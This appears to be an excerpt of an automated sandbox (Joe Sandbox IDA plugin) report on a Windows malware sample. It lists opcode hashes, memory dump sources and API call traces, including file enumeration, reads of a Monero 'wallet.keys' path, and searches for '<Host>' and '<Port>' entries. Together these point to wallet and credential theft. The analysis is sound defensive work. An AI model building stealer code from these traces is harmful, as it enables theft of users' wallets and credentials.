                  • Instruction ID: ae89ae8b6953002547fa80fb0e9b7d407a9ac926dea9b5c3dba708c23d4f28b6
                  • Opcode Fuzzy Hash: 498fa2f64c52aeba4e9c1e91f417b9a9b2aa22998f2ffdc63649923319429494
                  • Instruction Fuzzy Hash: B46157B3E082149FE3046E19DC9477AB7D6EBD4720F2B463DDAC867384E9761C058786
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003015B8,00300D96), ref: 002EF71E
                  • StrCmpCA.SHLWAPI(?,003015BC), ref: 002EF76F
                  • StrCmpCA.SHLWAPI(?,003015C0), ref: 002EF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002EFAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 6cc9905fa77e7ebc35fc860eccf5b550f15a3c455398264bba9d0f36d044597b
                  • Instruction ID: 22fe3040eb56e23c271384b31ffbde4a9472dcba165ce7c11dd678271125d231
                  • Opcode Fuzzy Hash: 6cc9905fa77e7ebc35fc860eccf5b550f15a3c455398264bba9d0f36d044597b
                  • Instruction Fuzzy Hash: E41175B182014D9BDB14EB60DC569FDB378AF11380F4083B5A61E56092EF702B5ACF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (s
                  • API String ID: 0-1718856627
                  • Opcode ID: 4051a4d3c38698210f50a853855bb9a22b7a7c7d38d843a7bd0ebea8c06e3cc9
                  • Instruction ID: f801abb4043ec21bf16baf5bbc560e35db3a87825619fcae7b9b7e67c4c52fca
                  • Opcode Fuzzy Hash: 4051a4d3c38698210f50a853855bb9a22b7a7c7d38d843a7bd0ebea8c06e3cc9
                  • Instruction Fuzzy Hash: 037104B3B082049FE708AE2DDC5677AB7E6EBD4320F1A493DE6C5C7384E9755C018686
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SQ'7
                  • API String ID: 0-4160367805
                  • Opcode ID: f757fc9fc9c415be989effa0e9a34173e20e72ed445af56e0c54123430f2ce54
                  • Instruction ID: 3368fd4340513c083df2845e22d9468c2b764ab24618cbb844c102b39cc4b5d1
                  • Opcode Fuzzy Hash: f757fc9fc9c415be989effa0e9a34173e20e72ed445af56e0c54123430f2ce54
                  • Instruction Fuzzy Hash: 745136F3A086144BE3085E3DDC9532ABBDAEBD4320F2B823EE5D5D3788ED7559014282
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 619ba80489a8da876afbb0436bb6dead78f34ea8ff17ea7b52a0ad271dcfb675
                  • Instruction ID: 8e9c5b035c580e437b741893f2b16c1f6a414c94c2b6723c2701b42d14c4f82d
                  • Opcode Fuzzy Hash: 619ba80489a8da876afbb0436bb6dead78f34ea8ff17ea7b52a0ad271dcfb675
                  • Instruction Fuzzy Hash: E7713DF3E056105BF3445A3DED4872ABADB9BD4720F2F823CD99893B8CED79590A4181
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c35bf571a6bfb4931bb885bfa1bad91564278118e584eb4c125a69cdab11b3ec
                  • Instruction ID: 6b0e596b78e941055a436b95e944703faccda36d116e98f190da0e3104e1964f
                  • Opcode Fuzzy Hash: c35bf571a6bfb4931bb885bfa1bad91564278118e584eb4c125a69cdab11b3ec
                  • Instruction Fuzzy Hash: B471D7B29083089FE3147F29DC4476AF7E6EB94720F0A893CE6D443784EA396854C687
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 210859aff19b5d716a17995cbd10c641904cfd6aad0ec0057abb3b18ce25bfe1
                  • Instruction ID: d3a769ef61d2091d845cc8ec9b816f34c0adcb44a4e0c7dd803b35c27df608ff
                  • Opcode Fuzzy Hash: 210859aff19b5d716a17995cbd10c641904cfd6aad0ec0057abb3b18ce25bfe1
                  • Instruction Fuzzy Hash: 1C5126F3E082145BF3146E29DCC8766BAD5EB98360F5A863DDAC897784E939580483C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad9c294d8a3966cd4bddff9af22d0aa781e86b298bde6f369e05ecc3d3a757ec
                  • Instruction ID: 5908150663c27c478cd22b468d0d70b671772dd3958f59acc33ebf45149a61c5
                  • Opcode Fuzzy Hash: ad9c294d8a3966cd4bddff9af22d0aa781e86b298bde6f369e05ecc3d3a757ec
                  • Instruction Fuzzy Hash: 6E41D6B36086009FE308AE29DC8577FF7E6EFD4320F26853DE6C483754EA3958418696
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf8417f9dab2b3de11d3967eb821b7ad85ca6118c8075d729851b90e8ea2e279
                  • Instruction ID: 5b8bb0ca858fb22cb1db936efec4ddc8e5819037c6482dd242baca3c23fecd6d
                  • Opcode Fuzzy Hash: cf8417f9dab2b3de11d3967eb821b7ad85ca6118c8075d729851b90e8ea2e279
                  • Instruction Fuzzy Hash: F941F7F3B145005FF314EE39EC847AAB6D6EBD4310F1A853CEA88C7784F539980A8295
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5484d66607441ce08bbc911dd8d7dbb7411c2f705692c261a949380b4354884
                  • Instruction ID: 10bf87b43389b2d5fd20e93a09e48458a682dfd33b4cc02ff938be047ba22f07
                  • Opcode Fuzzy Hash: a5484d66607441ce08bbc911dd8d7dbb7411c2f705692c261a949380b4354884
                  • Instruction Fuzzy Hash: 254129F260C3049FE304AE29EC857BABBD5EBD4320F19853DE6D8C3780E67448058696
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4a6b35d261e783b652fa33e77de01e776296213be93c4ff03aa72c89e3178bb
                  • Instruction ID: 76c5e7fc545cfb135734b5faa3a2ab60731520580340182e120db29930c3ae70
                  • Opcode Fuzzy Hash: c4a6b35d261e783b652fa33e77de01e776296213be93c4ff03aa72c89e3178bb
                  • Instruction Fuzzy Hash: D04106B39082209FE3559A29DC007BAB3D5EF84320F16853DDED4D7780EA355C0587C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 131ee8be36cb96963ed0c148a45ce3674ccd623df2315131e2faa03da6c71434
                  • Instruction ID: 48dde7b23d16001f7ea78ae0b92567aa25a46a52f3667965a51e44e78541bbe6
                  • Opcode Fuzzy Hash: 131ee8be36cb96963ed0c148a45ce3674ccd623df2315131e2faa03da6c71434
                  • Instruction Fuzzy Hash: 0E4168F3E086108BE304AA29EC4572BB7D6EBD4320F16C63CDAC953784E93958058686
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00300DBA,00300DB7,00300DB6,00300DB3), ref: 002F0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002F0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002F03CF
